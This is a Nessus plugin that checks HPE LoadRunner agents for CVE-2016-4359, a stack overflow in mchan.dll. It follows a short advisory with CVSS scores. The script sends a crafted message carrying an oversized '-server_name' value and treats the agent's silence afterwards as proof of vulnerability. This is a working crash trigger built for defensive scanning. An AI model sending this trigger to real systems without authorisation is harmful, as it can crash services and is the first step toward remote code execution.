
HPE LoadRunner Shared Memory Name Construction RCE


CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS

0.317

Percentile

97.1%

The Hewlett Packard Enterprise (HPE) LoadRunner application running on the remote host is affected by a stack-based buffer overflow condition in mchan.dll, when constructing a shared memory file name, due to improper validation of the size of a user-supplied string. An unauthenticated, remote attacker can exploit this, via a long '-server_name' value, to execute arbitrary code with the privileges of the user running the application.

Note that LoadRunner reportedly is affected by other vulnerabilities, which can result in a denial of service; however, Nessus has not tested for these.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(91972);
  script_version("1.11");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  # References for this issue: the CVE, the ZDI advisory, the HPE
  # security bulletin / PSRT case / support document, and the Tenable
  # Research Advisory.
  script_cve_id("CVE-2016-4359");
  script_xref(name:"ZDI", value:"ZDI-16-363");
  script_xref(name:"HP", value:"HPSBGN03609");
  script_xref(name:"HP", value:"PSRT110020");
  script_xref(name:"HP", value:"emr_na-c05157423");
  script_xref(name:"TRA", value:"TRA-2016-16");

  script_name(english:"HPE LoadRunner Shared Memory Name Construction RCE");

  script_set_attribute(attribute:"synopsis", value:
"A software performance testing application running on the remote host
is affected by a remote code execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The Hewlett Packard Enterprise (HPE) LoadRunner application running
on the remote host is affected by a stack-based buffer overflow
condition in mchan.dll, when constructing a shared memory file name,
due to improper validation of the size of a user-supplied string. An
unauthenticated, remote attacker can exploit this, via a long
'-server_name' value, to execute arbitrary code with the privileges of
the user running the application.

Note that LoadRunner reportedly is affected by other vulnerabilities,
which can result in a denial of service; however, Nessus has not
tested for these.");
  # https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-c05157423
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?1dac9898");
  script_set_attribute(attribute:"solution", value:
"Apply the appropriate patch or upgrade according to the vendor
advisory.");
  # CVSS2 7.5 / CVSS3 9.8: network, no auth, no user interaction.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2016-4359");

  # Exploitability metadata as of the last plugin revision; the check
  # below does not rely on a public exploit, it crafts its own request.
  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"false");

  script_set_attribute(attribute:"vuln_publication_date", value:"2016/06/01");
  script_set_attribute(attribute:"patch_publication_date", value:"2016/05/31");
  script_set_attribute(attribute:"plugin_publication_date", value:"2016/07/07");

  # Remote (unauthenticated network) check. thorough_tests is required
  # because the probe is intrusive, see ACT_DENIAL below.
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:hp:loadrunner");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  # ACT_DENIAL: the check sends the overflow trigger and infers the result
  # from whether the agent still answers afterwards, so a vulnerable
  # agent may be left crashed or wedged (the main body notes a Windows
  # Error Report dialog can appear).
  script_category(ACT_DENIAL);
  script_family(english:"Gain a shell remotely");

  script_copyright(english:"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");

  # loadrunner_agent_detect.nasl supplies Services/loadrunner_agent;
  # os_fingerprint.nasl supplies Host/OS, read by the Windows-only gate
  # in the main body.
  script_dependencies("loadrunner_agent_detect.nasl", "os_fingerprint.nasl");
  script_require_ports("Services/loadrunner_agent", 54345);

  exit(0);
}

include('audit.inc');
include('byte_func.inc');
include('global_settings.inc');
include('misc_func.inc');
include('dump.inc');

# Encode the single anonymous integer argument as a 4-byte big-endian
# DWORD. Every length and type field of the agent message framing in
# this plugin is built through this helper.
function mkdword_be()
{
  local_var value;

  value = _FCT_ANON_ARGS[0];
  return mkdword(value, order:BYTE_ORDER_BIG_ENDIAN);
}

# Length-prefixed block: a big-endian DWORD length followed by 'data'.
#
# data      - payload bytes.
# len       - explicit value for the length prefix. When NULL the length
#             of 'data' is used; supplying it lets a caller emit a prefix
#             that disagrees with the payload.
# inclusive - when the length is computed, also count the 4-byte prefix
#             itself. Ignored when 'len' is supplied.
function block(data, len, inclusive)
{
  local_var prefix_len;

  prefix_len = len;
  if (isnull(prefix_len))
  {
    prefix_len = strlen(data);
    if (inclusive) prefix_len += 4;
  }

  return mkdword_be(prefix_len) + data;
}

# XDR-style string: 4-byte big-endian length, the bytes of 's', then NUL
# padding up to the next 4-byte boundary.
#
# s   - string to encode.
# len - optional override for the length field. When given, the string
#       is emitted with that length and no padding, which deliberately
#       allows an ill-formed encoding to be produced.
function xdr_string(s, len)
{
  local_var encoded, pad;

  # Caller-supplied length: prefix as given, no padding.
  if (!isnull(len)) return block(data:s, len:len);

  encoded = block(data:s);

  # Zero bytes needed to reach a multiple of 4 (0..3).
  pad = (4 - strlen(encoded) % 4) % 4;
  encoded += crap(data:'\x00', length:pad);

  return encoded;
}


#
# MAIN
#

# Only the Windows build is believed to be affected. If the OS could not
# be fingerprinted, the check still proceeds.
os = get_kb_item('Host/OS');
if (os && 'Windows' >!< os)
  audit(AUDIT_OS_NOT, 'Windows');

# Require a detected LoadRunner agent service; exits otherwise.
port = get_service(svc:'loadrunner_agent', exit_on_fail:TRUE);

# Plain TCP transport is the one known to work; SSL may also work but is
# not attempted here.
soc = open_sock_tcp(port, transport: ENCAPS_IP);
if (!soc) audit(AUDIT_SOCK_FAIL, port, 'TCP');  


#
# Build the trigger request
#
# Every message starts with a length-prefixed random GUID block ('blk1'),
# followed by one framed message (header block + body block).
guid = base64(str:rand_str(length:16));
blk1 = block(data: guid +"0");

# Message header: four big-endian fields, the third being 16 filler bytes.
hdr =  mkdword_be(0x0d) +             
       mkdword_be(0x01) +             
       crap(data:'X',length:16) +
       mkdword_be(0x00);              

# Max size: 0x400 bytes 
# Connection string carrying the oversized -server_name value that is
# copied without a size check when mchan.dll builds the shared memory
# file name (see the plugin description).
conn_str = "(-server_type=2)" +
           "(-server_name=" + crap(data:'A', length:0x380) + ")";

# Message body: type 0x06, the XDR-encoded connection string, and a
# trailing constant.
body  = mkdword_be(0x06)+                     
        xdr_string(s:conn_str) + 
        mkdword_be(0x7530);

# Header and body lengths include their own 4-byte prefix; the outer
# message length does not. 'hdr' keeps its wrapped form and is reused
# as-is for the second message below.
hdr   = block(data:hdr, inclusive: TRUE);
body  = block(data:body, inclusive: TRUE);
msg   = block(data:hdr + body);
req   = blk1 + msg;

send(socket:soc, data:req);

# Do not close the socket right after the send: doing so can prevent the
# remote service from processing the packet. Whatever comes back here is
# not used for the verdict; the recv only keeps the connection open long
# enough for the agent to act on the request.
res = recv(socket:soc, length:4096);
close(soc);

# Verdict: a Windows Error Report dialog can pop up while the agent
# process/service is not entirely dead and still accepts TCP connections,
# so "connection refused" alone is not a reliable signal. Instead a
# well-formed agent-protocol message is sent on a fresh connection: a
# vulnerable (crashed) service does not reply, a patched one does.
res = NULL;
soc = open_sock_tcp(port, transport: ENCAPS_IP);
if (soc)  
{
  pid = rand() % 0xffff;
  tid = rand() % 0xffff;
  server_name = "nessus";
  server_ip = compat::this_host();
  server_port = get_source_port(soc); 
  # Benign connection string identifying the scanner itself, with a
  # short -server_name and the same GUID as the first message.
  conn_str = "(-server_type=8)" +
         "(-server_name=" + server_name + ")" +
         "(-server_full_name=" + server_name + ")" +
         "(-server_ip_name=" + server_ip + ")" +
         "(-server_port=" + server_port + ")" +
         "(-server_fd_secondary=4)" +
         "(-guid_identifier=" + guid + ")";

  # Message type 0x0f, two XDR strings, then two trailing constants.
  body  = mkdword_be(0x0f)+                    
          xdr_string(s: server_name + ";" + pid + ";" + tid) +
          xdr_string(s:conn_str) + 
          mkdword_be(0x7530) +
          mkdword_be(0x8);
  body  = block(data:body, inclusive: TRUE);
  msg   = block(data:hdr + body);
  req2   = blk1 + msg;

  send(socket:soc, data:req2);
  res = recv(socket:soc, length:4096);
  close(soc);
}
# Any response to the well-formed message means the agent survived the
# trigger and is treated as patched.
if(res)
{
  audit(AUDIT_LISTEN_NOT_VULN, 'HP LoadRunner Agent', port);
}
# No second connection or no response: reported as vulnerable. Note that a
# reconnect blocked for an unrelated reason (e.g. a connection limit or
# the service restarting) would also land here, so a finding from this
# plugin should be confirmed against the installed version.
else
{
  # The trigger request is attached as the report's evidence.
  security_report_v4(
    port:       port,
    severity:   SECURITY_HOLE,
    generic:    TRUE,
    request:    make_list(hexdump(ddata:req))
  );
}
